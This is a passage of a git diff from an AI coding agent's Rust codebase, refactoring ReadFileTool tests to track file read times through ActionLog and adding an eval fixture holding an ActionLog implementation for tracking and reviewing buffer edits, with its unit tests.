thread.downgrade(), project.clone(), - action_log, + action_log.clone(), + true, )); // Read the file to record the read time @@ -2237,12 +2218,9 @@ mod tests { .unwrap(); // Verify that file_read_times now contains an entry for the file - let has_entry = thread.read_with(cx, |thread, _| { - thread.file_read_times.len() == 1 - && thread - .file_read_times - .keys() - .any(|path| path.ends_with("test.txt")) + let has_entry = action_log.read_with(cx, |log, _| { + 
log.file_read_time(path!("/root/test.txt").as_ref()) + .is_some() }); assert!( has_entry, @@ -2264,11 +2242,14 @@ mod tests { .await .unwrap(); - // Should still have exactly one entry - let has_one_entry = thread.read_with(cx, |thread, _| thread.file_read_times.len() == 1); + // Should still have an entry after re-reading + let has_entry = action_log.read_with(cx, |log, _| { + log.file_read_time(path!("/root/test.txt").as_ref()) + .is_some() + }); assert!( - has_one_entry, - "file_read_times should still have one entry after re-reading" + has_entry, + "file_read_times should still have an entry after re-reading" ); } @@ -2308,11 +2289,7 @@ mod tests { let languages = project.read_with(cx, |project, _| project.languages().clone()); let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); let edit_tool = Arc::new(EditFileTool::new( project.clone(), thread.downgrade(), @@ -2422,11 +2399,7 @@ mod tests { let languages = project.read_with(cx, |project, _| project.languages().clone()); let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); let edit_tool = Arc::new(EditFileTool::new( project.clone(), thread.downgrade(), @@ -2533,11 +2506,7 @@ mod tests { let languages = project.read_with(cx, |project, _| project.languages().clone()); let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let read_tool = Arc::new(crate::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); let edit_tool 
= Arc::new(EditFileTool::new( project.clone(), thread.downgrade(), diff --git a/crates/agent/src/tools/evals.rs b/crates/agent/src/tools/evals.rs new file mode 100644 index 0000000000000000000000000000000000000000..13b8413de6455c9e5b4f719ba079a136ac857b9d --- /dev/null +++ b/crates/agent/src/tools/evals.rs @@ -0,0 +1,2 @@ +#[cfg(all(test, feature = "unit-eval"))] +mod streaming_edit_file; diff --git a/crates/agent/src/tools/evals/fixtures/add_overwrite_test/before.rs b/crates/agent/src/tools/evals/fixtures/add_overwrite_test/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..0d2a0be1fb889a74d0251e1493e6988aaded068e --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/add_overwrite_test/before.rs @@ -0,0 +1,1572 @@ +use anyhow::{Context as _, Result}; +use buffer_diff::BufferDiff; +use collections::BTreeMap; +use futures::{StreamExt, channel::mpsc}; +use gpui::{App, AppContext, AsyncApp, Context, Entity, Subscription, Task, WeakEntity}; +use language::{Anchor, Buffer, BufferEvent, DiskState, Point, ToPoint}; +use project::{Project, ProjectItem, lsp_store::OpenLspBufferHandle}; +use std::{cmp, ops::Range, sync::Arc}; +use text::{Edit, Patch, Rope}; +use util::RangeExt; + +/// Tracks actions performed by tools in a thread +pub struct ActionLog { + /// Buffers that we want to notify the model about when they change. + tracked_buffers: BTreeMap, TrackedBuffer>, + /// Has the model edited a file since it last checked diagnostics? + edited_since_project_diagnostics_check: bool, + /// The project this action log is associated with + project: Entity, +} + +impl ActionLog { + /// Creates a new, empty action log associated with the given project. 
+ pub fn new(project: Entity) -> Self { + Self { + tracked_buffers: BTreeMap::default(), + edited_since_project_diagnostics_check: false, + project, + } + } + + pub fn project(&self) -> &Entity { + &self.project + } + + /// Notifies a diagnostics check + pub fn checked_project_diagnostics(&mut self) { + self.edited_since_project_diagnostics_check = false; + } + + /// Returns true if any files have been edited since the last project diagnostics check + pub fn has_edited_files_since_project_diagnostics_check(&self) -> bool { + self.edited_since_project_diagnostics_check + } + + fn track_buffer_internal( + &mut self, + buffer: Entity, + is_created: bool, + cx: &mut Context, + ) -> &mut TrackedBuffer { + let tracked_buffer = self + .tracked_buffers + .entry(buffer.clone()) + .or_insert_with(|| { + let open_lsp_handle = self.project.update(cx, |project, cx| { + project.register_buffer_with_language_servers(&buffer, cx) + }); + + let text_snapshot = buffer.read(cx).text_snapshot(); + let diff = cx.new(|cx| BufferDiff::new(&text_snapshot, cx)); + let (diff_update_tx, diff_update_rx) = mpsc::unbounded(); + let base_text; + let status; + let unreviewed_changes; + if is_created { + base_text = Rope::default(); + status = TrackedBufferStatus::Created; + unreviewed_changes = Patch::new(vec![Edit { + old: 0..1, + new: 0..text_snapshot.max_point().row + 1, + }]) + } else { + base_text = buffer.read(cx).as_rope().clone(); + status = TrackedBufferStatus::Modified; + unreviewed_changes = Patch::default(); + } + TrackedBuffer { + buffer: buffer.clone(), + base_text, + unreviewed_changes, + snapshot: text_snapshot.clone(), + status, + version: buffer.read(cx).version(), + diff, + diff_update: diff_update_tx, + _open_lsp_handle: open_lsp_handle, + _maintain_diff: cx.spawn({ + let buffer = buffer.clone(); + async move |this, cx| { + Self::maintain_diff(this, buffer, diff_update_rx, cx) + .await + .ok(); + } + }), + _subscription: cx.subscribe(&buffer, Self::handle_buffer_event), + } + 
}); + tracked_buffer.version = buffer.read(cx).version(); + tracked_buffer + } + + fn handle_buffer_event( + &mut self, + buffer: Entity, + event: &BufferEvent, + cx: &mut Context, + ) { + match event { + BufferEvent::Edited { .. } => self.handle_buffer_edited(buffer, cx), + BufferEvent::FileHandleChanged => { + self.handle_buffer_file_changed(buffer, cx); + } + _ => {} + }; + } + + fn handle_buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { + let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { + return; + }; + tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); + } + + fn handle_buffer_file_changed(&mut self, buffer: Entity, cx: &mut Context) { + let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { + return; + }; + + match tracked_buffer.status { + TrackedBufferStatus::Created | TrackedBufferStatus::Modified => { + if buffer + .read(cx) + .file() + .map_or(false, |file| file.disk_state() == DiskState::Deleted) + { + // If the buffer had been edited by a tool, but it got + // deleted externally, we want to stop tracking it. + self.tracked_buffers.remove(&buffer); + } + cx.notify(); + } + TrackedBufferStatus::Deleted => { + if buffer + .read(cx) + .file() + .map_or(false, |file| file.disk_state() != DiskState::Deleted) + { + // If the buffer had been deleted by a tool, but it got + // resurrected externally, we want to clear the changes we + // were tracking and reset the buffer's state. 
+ self.tracked_buffers.remove(&buffer); + self.track_buffer_internal(buffer, false, cx); + } + cx.notify(); + } + } + } + + async fn maintain_diff( + this: WeakEntity, + buffer: Entity, + mut diff_update: mpsc::UnboundedReceiver<(ChangeAuthor, text::BufferSnapshot)>, + cx: &mut AsyncApp, + ) -> Result<()> { + while let Some((author, buffer_snapshot)) = diff_update.next().await { + let (rebase, diff, language, language_registry) = + this.read_with(cx, |this, cx| { + let tracked_buffer = this + .tracked_buffers + .get(&buffer) + .context("buffer not tracked")?; + + let rebase = cx.background_spawn({ + let mut base_text = tracked_buffer.base_text.clone(); + let old_snapshot = tracked_buffer.snapshot.clone(); + let new_snapshot = buffer_snapshot.clone(); + let unreviewed_changes = tracked_buffer.unreviewed_changes.clone(); + async move { + let edits = diff_snapshots(&old_snapshot, &new_snapshot); + if let ChangeAuthor::User = author { + apply_non_conflicting_edits( + &unreviewed_changes, + edits, + &mut base_text, + new_snapshot.as_rope(), + ); + } + (Arc::new(base_text.to_string()), base_text) + } + }); + + anyhow::Ok(( + rebase, + tracked_buffer.diff.clone(), + tracked_buffer.buffer.read(cx).language().cloned(), + tracked_buffer.buffer.read(cx).language_registry(), + )) + })??; + + let (new_base_text, new_base_text_rope) = rebase.await; + let diff_snapshot = BufferDiff::update_diff( + diff.clone(), + buffer_snapshot.clone(), + Some(new_base_text), + true, + false, + language, + language_registry, + cx, + ) + .await; + + let mut unreviewed_changes = Patch::default(); + if let Ok(diff_snapshot) = diff_snapshot { + unreviewed_changes = cx + .background_spawn({ + let diff_snapshot = diff_snapshot.clone(); + let buffer_snapshot = buffer_snapshot.clone(); + let new_base_text_rope = new_base_text_rope.clone(); + async move { + let mut unreviewed_changes = Patch::default(); + for hunk in diff_snapshot.hunks_intersecting_range( + Anchor::MIN..Anchor::MAX, + &buffer_snapshot, 
+ ) { + let old_range = new_base_text_rope + .offset_to_point(hunk.diff_base_byte_range.start) + ..new_base_text_rope + .offset_to_point(hunk.diff_base_byte_range.end); + let new_range = hunk.range.start..hunk.range.end; + unreviewed_changes.push(point_to_row_edit( + Edit { + old: old_range, + new: new_range, + }, + &new_base_text_rope, + &buffer_snapshot.as_rope(), + )); + } + unreviewed_changes + } + }) + .await; + + diff.update(cx, |diff, cx| { + diff.set_snapshot(diff_snapshot, &buffer_snapshot, cx) + })?; + } + this.update(cx, |this, cx| { + let tracked_buffer = this + .tracked_buffers + .get_mut(&buffer) + .context("buffer not tracked")?; + tracked_buffer.base_text = new_base_text_rope; + tracked_buffer.snapshot = buffer_snapshot; + tracked_buffer.unreviewed_changes = unreviewed_changes; + cx.notify(); + anyhow::Ok(()) + })??; + } + + Ok(()) + } + + /// Track a buffer as read, so we can notify the model about user edits. + pub fn buffer_read(&mut self, buffer: Entity, cx: &mut Context) { + self.track_buffer_internal(buffer, false, cx); + } + + /// Mark a buffer as edited, so we can refresh it in the context + pub fn buffer_created(&mut self, buffer: Entity, cx: &mut Context) { + self.edited_since_project_diagnostics_check = true; + self.tracked_buffers.remove(&buffer); + self.track_buffer_internal(buffer.clone(), true, cx); + } + + /// Mark a buffer as edited, so we can refresh it in the context + pub fn buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { + self.edited_since_project_diagnostics_check = true; + + let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); + if let TrackedBufferStatus::Deleted = tracked_buffer.status { + tracked_buffer.status = TrackedBufferStatus::Modified; + } + tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + } + + pub fn will_delete_buffer(&mut self, buffer: Entity, cx: &mut Context) { + let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); + match 
tracked_buffer.status { + TrackedBufferStatus::Created => { + self.tracked_buffers.remove(&buffer); + cx.notify(); + } + TrackedBufferStatus::Modified => { + buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); + tracked_buffer.status = TrackedBufferStatus::Deleted; + tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); + } + TrackedBufferStatus::Deleted => {} + } + cx.notify(); + } + + pub fn keep_edits_in_range( + &mut self, + buffer: Entity, + buffer_range: Range, + cx: &mut Context, + ) { + let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { + return; + }; + + match tracked_buffer.status { + TrackedBufferStatus::Deleted => { + self.tracked_buffers.remove(&buffer); + cx.notify(); + } + _ => { + let buffer = buffer.read(cx); + let buffer_range = + buffer_range.start.to_point(buffer)..buffer_range.end.to_point(buffer); + let mut delta = 0i32; + + tracked_buffer.unreviewed_changes.retain_mut(|edit| { + edit.old.start = (edit.old.start as i32 + delta) as u32; + edit.old.end = (edit.old.end as i32 + delta) as u32; + + if buffer_range.end.row < edit.new.start + || buffer_range.start.row > edit.new.end + { + true + } else { + let old_range = tracked_buffer + .base_text + .point_to_offset(Point::new(edit.old.start, 0)) + ..tracked_buffer.base_text.point_to_offset(cmp::min( + Point::new(edit.old.end, 0), + tracked_buffer.base_text.max_point(), + )); + let new_range = tracked_buffer + .snapshot + .point_to_offset(Point::new(edit.new.start, 0)) + ..tracked_buffer.snapshot.point_to_offset(cmp::min( + Point::new(edit.new.end, 0), + tracked_buffer.snapshot.max_point(), + )); + tracked_buffer.base_text.replace( + old_range, + &tracked_buffer + .snapshot + .text_for_range(new_range) + .collect::(), + ); + delta += edit.new_len() as i32 - edit.old_len() as i32; + false + } + }); + tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); + } + } + } + + pub fn reject_edits_in_ranges( + &mut self, + buffer: Entity, + buffer_ranges: Vec>, + cx: 
&mut Context, + ) -> Task> { + let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { + return Task::ready(Ok(())); + }; + + match tracked_buffer.status { + TrackedBufferStatus::Created => { + let delete = buffer + .read(cx) + .entry_id(cx) + .and_then(|entry_id| { + self.project + .update(cx, |project, cx| project.delete_entry(entry_id, false, cx)) + }) + .unwrap_or(Task::ready(Ok(()))); + self.tracked_buffers.remove(&buffer); + cx.notify(); + delete + } + TrackedBufferStatus::Deleted => { + buffer.update(cx, |buffer, cx| { + buffer.set_text(tracked_buffer.base_text.to_string(), cx) + }); + let save = self + .project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)); + + // Clear all tracked changes for this buffer and start over as if we just read it. + self.tracked_buffers.remove(&buffer); + self.buffer_read(buffer.clone(), cx); + cx.notify(); + save + } + TrackedBufferStatus::Modified => { + buffer.update(cx, |buffer, cx| { + let mut buffer_row_ranges = buffer_ranges + .into_iter() + .map(|range| { + range.start.to_point(buffer).row..range.end.to_point(buffer).row + }) + .peekable(); + + let mut edits_to_revert = Vec::new(); + for edit in tracked_buffer.unreviewed_changes.edits() { + let new_range = tracked_buffer + .snapshot + .anchor_before(Point::new(edit.new.start, 0)) + ..tracked_buffer.snapshot.anchor_after(cmp::min( + Point::new(edit.new.end, 0), + tracked_buffer.snapshot.max_point(), + )); + let new_row_range = new_range.start.to_point(buffer).row + ..new_range.end.to_point(buffer).row; + + let mut revert = false; + while let Some(buffer_row_range) = buffer_row_ranges.peek() { + if buffer_row_range.end < new_row_range.start { + buffer_row_ranges.next(); + } else if buffer_row_range.start > new_row_range.end { + break; + } else { + revert = true; + break; + } + } + + if revert { + let old_range = tracked_buffer + .base_text + .point_to_offset(Point::new(edit.old.start, 0)) + 
..tracked_buffer.base_text.point_to_offset(cmp::min( + Point::new(edit.old.end, 0), + tracked_buffer.base_text.max_point(), + )); + let old_text = tracked_buffer + .base_text + .chunks_in_range(old_range) + .collect::(); + edits_to_revert.push((new_range, old_text)); + } + } + + buffer.edit(edits_to_revert, None, cx); + }); + self.project + .update(cx, |project, cx| project.save_buffer(buffer, cx)) + } + } + } + + pub fn keep_all_edits(&mut self, cx: &mut Context) { + self.tracked_buffers + .retain(|_buffer, tracked_buffer| match tracked_buffer.status { + TrackedBufferStatus::Deleted => false, + _ => { + tracked_buffer.unreviewed_changes.clear(); + tracked_buffer.base_text = tracked_buffer.snapshot.as_rope().clone(); + tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); + true + } + }); + cx.notify(); + } + + /// Returns the set of buffers that contain changes that haven't been reviewed by the user. + pub fn changed_buffers(&self, cx: &App) -> BTreeMap, Entity> { + self.tracked_buffers + .iter() + .filter(|(_, tracked)| tracked.has_changes(cx)) + .map(|(buffer, tracked)| (buffer.clone(), tracked.diff.clone())) + .collect() + } + + /// Iterate over buffers changed since last read or edited by the model + pub fn stale_buffers<'a>(&'a self, cx: &'a App) -> impl Iterator> { + self.tracked_buffers + .iter() + .filter(|(buffer, tracked)| { + let buffer = buffer.read(cx); + + tracked.version != buffer.version + && buffer + .file() + .map_or(false, |file| file.disk_state() != DiskState::Deleted) + }) + .map(|(buffer, _)| buffer) + } +} + +fn apply_non_conflicting_edits( + patch: &Patch, + edits: Vec>, + old_text: &mut Rope, + new_text: &Rope, +) { + let mut old_edits = patch.edits().iter().cloned().peekable(); + let mut new_edits = edits.into_iter().peekable(); + let mut applied_delta = 0i32; + let mut rebased_delta = 0i32; + + while let Some(mut new_edit) = new_edits.next() { + let mut conflict = false; + + // Push all the old edits that are before this new edit 
or that intersect with it. + while let Some(old_edit) = old_edits.peek() { + if new_edit.old.end < old_edit.new.start + || (!old_edit.new.is_empty() && new_edit.old.end == old_edit.new.start) + { + break; + } else if new_edit.old.start > old_edit.new.end + || (!old_edit.new.is_empty() && new_edit.old.start == old_edit.new.end) + { + let old_edit = old_edits.next().unwrap(); + rebased_delta += old_edit.new_len() as i32 - old_edit.old_len() as i32; + } else { + conflict = true; + if new_edits + .peek() + .map_or(false, |next_edit| next_edit.old.overlaps(&old_edit.new)) + { + new_edit = new_edits.next().unwrap(); + } else { + let old_edit = old_edits.next().unwrap(); + rebased_delta += old_edit.new_len() as i32 - old_edit.old_len() as i32; + } + } + } + + if !conflict { + // This edit doesn't intersect with any old edit, so we can apply it to the old text. + new_edit.old.start = (new_edit.old.start as i32 + applied_delta - rebased_delta) as u32; + new_edit.old.end = (new_edit.old.end as i32 + applied_delta - rebased_delta) as u32; + let old_bytes = old_text.point_to_offset(Point::new(new_edit.old.start, 0)) + ..old_text.point_to_offset(cmp::min( + Point::new(new_edit.old.end, 0), + old_text.max_point(), + )); + let new_bytes = new_text.point_to_offset(Point::new(new_edit.new.start, 0)) + ..new_text.point_to_offset(cmp::min( + Point::new(new_edit.new.end, 0), + new_text.max_point(), + )); + + old_text.replace( + old_bytes, + &new_text.chunks_in_range(new_bytes).collect::(), + ); + applied_delta += new_edit.new_len() as i32 - new_edit.old_len() as i32; + } + } +} + +fn diff_snapshots( + old_snapshot: &text::BufferSnapshot, + new_snapshot: &text::BufferSnapshot, +) -> Vec> { + let mut edits = new_snapshot + .edits_since::(&old_snapshot.version) + .map(|edit| point_to_row_edit(edit, old_snapshot.as_rope(), new_snapshot.as_rope())) + .peekable(); + let mut row_edits = Vec::new(); + while let Some(mut edit) = edits.next() { + while let Some(next_edit) = edits.peek() { + if 
edit.old.end >= next_edit.old.start { + edit.old.end = next_edit.old.end; + edit.new.end = next_edit.new.end; + edits.next(); + } else { + break; + } + } + row_edits.push(edit); + } + row_edits +} + +fn point_to_row_edit(edit: Edit, old_text: &Rope, new_text: &Rope) -> Edit { + if edit.old.start.column == old_text.line_len(edit.old.start.row) + && new_text + .chars_at(new_text.point_to_offset(edit.new.start)) + .next() + == Some('\n') + && edit.old.start != old_text.max_point() + { + Edit { + old: edit.old.start.row + 1..edit.old.end.row + 1, + new: edit.new.start.row + 1..edit.new.end.row + 1, + } + } else if edit.old.start.column == 0 + && edit.old.end.column == 0 + && edit.new.end.column == 0 + && edit.old.end != old_text.max_point() + { + Edit { + old: edit.old.start.row..edit.old.end.row, + new: edit.new.start.row..edit.new.end.row, + } + } else { + Edit { + old: edit.old.start.row..edit.old.end.row + 1, + new: edit.new.start.row..edit.new.end.row + 1, + } + } +} + +#[derive(Copy, Clone, Debug)] +enum ChangeAuthor { + User, + Agent, +} + +#[derive(Copy, Clone, Eq, PartialEq)] +enum TrackedBufferStatus { + Created, + Modified, + Deleted, +} + +struct TrackedBuffer { + buffer: Entity, + base_text: Rope, + unreviewed_changes: Patch, + status: TrackedBufferStatus, + version: clock::Global, + diff: Entity, + snapshot: text::BufferSnapshot, + diff_update: mpsc::UnboundedSender<(ChangeAuthor, text::BufferSnapshot)>, + _open_lsp_handle: OpenLspBufferHandle, + _maintain_diff: Task<()>, + _subscription: Subscription, +} + +impl TrackedBuffer { + fn has_changes(&self, cx: &App) -> bool { + self.diff + .read(cx) + .hunks(&self.buffer.read(cx), cx) + .next() + .is_some() + } + + fn schedule_diff_update(&self, author: ChangeAuthor, cx: &App) { + self.diff_update + .unbounded_send((author, self.buffer.read(cx).text_snapshot())) + .ok(); + } +} + +pub struct ChangedBuffer { + pub diff: Entity, +} + +#[cfg(test)] +mod tests { + use std::env; + + use super::*; + use 
buffer_diff::DiffHunkStatusKind; + use gpui::TestAppContext; + use language::Point; + use project::{FakeFs, Fs, Project, RemoveOptions}; + use rand::prelude::*; + use serde_json::json; + use settings::SettingsStore; + use util::{RandomCharIter, path}; + + #[ctor::ctor] + fn init_logger() { + zlog::init_test(); + } + + fn init_test(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + language::init(cx); + Project::init_settings(cx); + }); + } + + #[gpui::test(iterations = 10)] + async fn test_keep_edits(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 1)..Point::new(1, 2), "E")], None, cx) + .unwrap() + }); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(4, 2)..Point::new(4, 3), "O")], None, cx) + .unwrap() + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndEf\nghi\njkl\nmnO" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 0)..Point::new(2, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(4, 0)..Point::new(4, 3), + diff_status: DiffHunkStatusKind::Modified, + 
old_text: "mno".into(), + } + ], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), Point::new(3, 0)..Point::new(4, 3), cx) + }); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(2, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\n".into(), + }], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), Point::new(0, 0)..Point::new(4, 3), cx) + }); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_deletions(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({"file": "abc\ndef\nghi\njkl\nmno\npqr"}), + ) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 0)..Point::new(2, 0), "")], None, cx) + .unwrap(); + buffer.finalize_last_transaction(); + }); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(3, 0)..Point::new(4, 0), "")], None, cx) + .unwrap(); + buffer.finalize_last_transaction(); + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\nghi\njkl\npqr" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![ + HunkStatus { + range: Point::new(1, 
0)..Point::new(1, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "def\n".into(), + }, + HunkStatus { + range: Point::new(3, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "mno\n".into(), + } + ], + )] + ); + + buffer.update(cx, |buffer, cx| buffer.undo(cx)); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\nghi\njkl\nmno\npqr" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(1, 0), + diff_status: DiffHunkStatusKind::Deleted, + old_text: "def\n".into(), + }], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), Point::new(1, 0)..Point::new(1, 0), cx) + }); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_overlapping_user_edits(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) + .await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + cx.update(|cx| { + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| { + buffer + .edit([(Point::new(1, 2)..Point::new(2, 3), "F\nGHI")], None, cx) + .unwrap() + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abc\ndeF\nGHI\njkl\nmno" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + 
vec![HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\nghi\n".into(), + }], + )] + ); + + buffer.update(cx, |buffer, cx| { + buffer.edit( + [ + (Point::new(0, 2)..Point::new(0, 2), "X"), + (Point::new(3, 0)..Point::new(3, 0), "Y"), + ], + None, + cx, + ) + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abXc\ndeF\nGHI\nYjkl\nmno" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\nghi\n".into(), + }], + )] + ); + + buffer.update(cx, |buffer, cx| { + buffer.edit([(Point::new(1, 1)..Point::new(1, 1), "Z")], None, cx) + }); + cx.run_until_parked(); + assert_eq!( + buffer.read_with(cx, |buffer, _| buffer.text()), + "abXc\ndZeF\nGHI\nYjkl\nmno" + ); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(1, 0)..Point::new(3, 0), + diff_status: DiffHunkStatusKind::Modified, + old_text: "def\nghi\n".into(), + }], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), Point::new(0, 0)..Point::new(1, 0), cx) + }); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_creating_files(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({})).await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file1", cx)) + .unwrap(); + + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + cx.update(|cx| { + action_log.update(cx, |log, 
cx| log.buffer_created(buffer.clone(), cx)); + buffer.update(cx, |buffer, cx| buffer.set_text("lorem", cx)); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .unwrap(); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 5), + diff_status: DiffHunkStatusKind::Added, + old_text: "".into(), + }], + )] + ); + + buffer.update(cx, |buffer, cx| buffer.edit([(0..0, "X")], None, cx)); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 6), + diff_status: DiffHunkStatusKind::Added, + old_text: "".into(), + }], + )] + ); + + action_log.update(cx, |log, cx| { + log.keep_edits_in_range(buffer.clone(), 0..5, cx) + }); + cx.run_until_parked(); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 10)] + async fn test_deleting_files(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({"file1": "lorem\n", "file2": "ipsum\n"}), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let file1_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file1", cx)) + .unwrap(); + let file2_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file2", cx)) + .unwrap(); + + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let buffer1 = project + .update(cx, |project, cx| { + project.open_buffer(file1_path.clone(), cx) + }) + .await + .unwrap(); + let buffer2 = project + .update(cx, |project, cx| { + project.open_buffer(file2_path.clone(), cx) + }) + .await + .unwrap(); + + action_log.update(cx, |log, cx| 
